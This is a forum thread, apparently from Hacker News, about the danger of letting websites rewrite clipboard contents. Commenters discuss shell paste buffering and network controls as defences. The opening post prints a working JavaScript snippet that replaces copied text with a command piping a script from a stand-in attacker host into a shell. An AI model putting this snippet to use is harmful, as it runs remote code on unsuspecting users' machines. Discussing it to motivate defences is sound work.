zlacker

Number one reason why I do not turn JavaScript on, and I will definitely block WebInegrityAPI indefinitely.

Basic malware JavaScript snippet:

    <script>
    document.getElementById('copy').addEventListener('copy', function(e) {
        e.clipboardData.setData('text/plain', 
        'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault();
     });
     </script>

replies(2): >>wester+Z3 >>jabart+Ul1

>>egbert+(OP)
This particular attack is actually not a concern if you're using fish (or zsh for that matter I think), as it will not execute pasted content without an additional pressing of the enter key.

replies(2): >>accoun+Kn >>fruitr+Bo3

>>wester+Z3
It's still a concern because there will be users reflexively pressing enter without checking what they pasted if it's the expected value most of the time.

Meanwhile there is zero benefit for letting websites manipulate the clipboard or intercept basic browser interactions. This might make sense for applications but that's just another argument why those shouldn't be forced into the same browser as websites.

replies(1): >>fruitr+Go3

>>egbert+(OP)
If you are working in a shell like that you should have outbound ports locked down and a list of allowed domains set in your proxy. Add in some antivirus and password sudo check and plenty of ways to catch this

replies(1): >>egbert+nJ2

>>jabart+Ul1
Thats why i have a lexical and intermediate representative (IR) code examiner of JavaScript running as an ICAP server capturing all HTTP/HTTPS connections.

No fear, there.

No need for all that other things.

>>wester+Z3
Bash also buffers pasted content.

>>accoun+Kn
Yeah, I'm disappointed there's no permission toggle so that I could have javascript-based clipboard setting behind a prompt on most websites and have exceptions for others.

replies(1): >>egbert+xGj

>>fruitr+Go3
Sound like an enhancement feature request for NoScript or UBlock Origin, no?